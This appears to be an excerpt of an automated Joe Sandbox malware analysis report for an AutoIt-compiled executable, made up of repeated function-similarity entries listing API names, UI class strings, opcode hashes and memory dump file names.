                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                            • Instruction ID: d39c75f61adf9d5a4dae13015cc1d3ed7ca651b1f3af9c840a31eb8422d1ad7a
                                                            • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                            • Instruction Fuzzy Hash: 9A018410E08BC682FF166735B4845FAF361AF98745FCD4379E94B61560CF28E9978620
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                            • Instruction ID: 89c9ef3d40af06128958c94f31c62b1f25db9d2cb0c881a3d026ab66844f7d0a
                                                            • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                            • Instruction Fuzzy Hash: 72019235B186D142EB00AB15B8497A9BA60BB85B94F9C4174DF9903BA5CF7DE4428B20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                            • Instruction ID: 9940feb60a689712105e997e647d980f0156c43e707aa531d1bd64fa211eea55
                                                            • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                            • Instruction Fuzzy Hash: C3F06561A1998282FF506F61FC547A863A0BF58F95FDC4034CA1E42254DF3C998A8770
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                            • Instruction ID: 059c22b2ee872372b5a9be8794b99b16588b397e790d77be2e53280d643f5e91
                                                            • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                            • Instruction Fuzzy Hash: 72E04821F0938286FF00BB61785C2B89655AF44FD1F894034CE0F53B55DF7D60065720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                            • Instruction ID: 92208323481425f1668e5764e3b97b2ce02915c5d0e2f209ba3b65ee2cea38c8
                                                            • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                            • Instruction Fuzzy Hash: 07E04F21F0938286EF00EB61B89C1B8A659AF49FD1F890030CE0F13B55DF7DA0068720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                            • Instruction ID: 41072355c8c3257039d48c046f8eecebe6bc06bf554f1e333b06605bbfddafd6
                                                            • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                            • Instruction Fuzzy Hash: E6913962B0A7C686EF25AF25A1403FCAB95AB25BD0F488131DB8D07395DF3DE911D311
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                            • Instruction ID: 39a6bbacd1a7680ad756a7b0f9acee76501049488d76ae87afe766c251da898d
                                                            • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                            • Instruction Fuzzy Hash: C1913776604B82C2DB14EF29E4406ADB3A5FB88B85F958036CF8D83724EF39D849C350
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                            • Instruction ID: f03b4254a19230052e5b588815732ce8a7657de1dde4fd2a466fb247b6869e53
                                                            • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                            • Instruction Fuzzy Hash: 99515962B197C646EB249F35A9403A9BA91EB81BD0F8C9235C79C47BDACF2CD841C710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\Desktop\EO3RT0fEfb.exe
                                                            • API String ID: 3307058713-1994901746
                                                            • Opcode ID: 6c87e2de3f4c0aeac315ff4329a83c64bfbcc05b24579d353487348f4d7a711e
                                                            • Instruction ID: 1ed36dc463091d608b9668a55c8afdca2cdec08c2ea8970beb602027e1e5f9cf
                                                            • Opcode Fuzzy Hash: 6c87e2de3f4c0aeac315ff4329a83c64bfbcc05b24579d353487348f4d7a711e
                                                            • Instruction Fuzzy Hash: 88418F32A09A9285FB14EF25A9400FDA7A5FF44B94BD84035E90E47795DF3DE8818360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateDestroyMessageObjectSendStock
                                                            • String ID: static
                                                            • API String ID: 3467290483-2160076837
                                                            • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                            • Instruction ID: 517b8f93619a2d72925b1b059f28e93c14b0dbcbadebd5ef7c267bc7c351738a
                                                            • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                            • Instruction Fuzzy Hash: ED41FF325086C287DA74AF25F4407EEB7A1FB84791F944139EBEA03A59DF3CD4819B50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                            • Instruction ID: c6684011fd580dafa830b8b450a58170f4f48ef64dab49c0a93f3e9aba486981
                                                            • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                            • Instruction Fuzzy Hash: A131D222A0868281EF50BB26E5542BDA760FB94B94F998532DE5E83395EF3CD546C320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSendStock
                                                            • String ID: $SysTabControl32
                                                            • API String ID: 2080134422-3143400907
                                                            • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                            • Instruction ID: 6d8f1220d5a8a6cc49f7552c0bab43ea5a18f8be46411baa90b726c7ef91180d
                                                            • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                            • Instruction Fuzzy Hash: 48315B325087C1CBEB60DF15B44479AB7A0F784BA4F584339EAA917AD8CB38D4558F50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                            • Instruction ID: db7329b503143679f03cb15d60be658d520a9c7152ed6d5b57008b3c118ea36c
                                                            • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                            • Instruction Fuzzy Hash: B221C522B0D6C641EF649B25E4901B9B650EB857B4FAC1339D66E077D8CF38DC82D321
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                            • Instruction ID: a096499f2c224127edcca001f4e5e442d874bc00a626e14f2270f017faa3561e
                                                            • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                            • Instruction Fuzzy Hash: A3311B36A087C18BD724DF29E44479AB7A5F788790F544229DB9943B98DF38E451CF10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Combobox
                                                            • API String ID: 1025951953-2096851135
                                                            • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                            • Instruction ID: f629c606e3b078b0ed1a80db36deea8a144ccc7ee04bf2712ce92888ee8e8ed8
                                                            • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                            • Instruction Fuzzy Hash: 7A3127326097C18BEB709F24B454B9AB7A1F785790F944239EBA903B99CF3DD841CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                            • Instruction ID: 78f7cc532fed035fb7ad194b9687395a67527878e5a839e17232b449819a77c7
                                                            • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                            • Instruction Fuzzy Hash: AA311A36A087C1CBEB60DB15B44479AB7A1FB84790F544235EAA943B98DF3CD881CB11
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$pow
                                                            • API String ID: 1757819995-713443511
                                                            • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                            • Instruction ID: 3d2d078d9a2c8d8be1ec7039f6b8f1cc4ea32544915f71e484c545d23cc6eb6c
                                                            • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                            • Instruction Fuzzy Hash: 5E217C72D2CAC587E770DF10F0406ABEAA0FBDA344F642325F28906A55CFBDD5869B50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                            • Instruction ID: 28806e6e8e3e645c590cd03fe7fc8b5efd55e438bae3d68b29ced289fba1d9b0
                                                            • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                            • Instruction Fuzzy Hash: EE119076A09AC181EA10FB21E4450E9B7A1FB95BA0F884231DAEC477DADF3CD506C750
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                            • Instruction ID: b9ecd577cdddb5f6ba2771ade03ea656c6b381c07e4715ef4f047ca9cf62b589
                                                            • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                            • Instruction Fuzzy Hash: ED116062A09AC691EF10F710F1555F9A750BF857C4F884131DADD07A8AEF2CD6098B60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                            • Instruction ID: f61b54c527cef6b975337ade6b1cadd80571a867953db66c0694407be17638ea
                                                            • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                            • Instruction Fuzzy Hash: 47115E66A09AC191EE10FB10F4555E9A360FB89784FC84531EA9D0769EEF2CD606CB60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
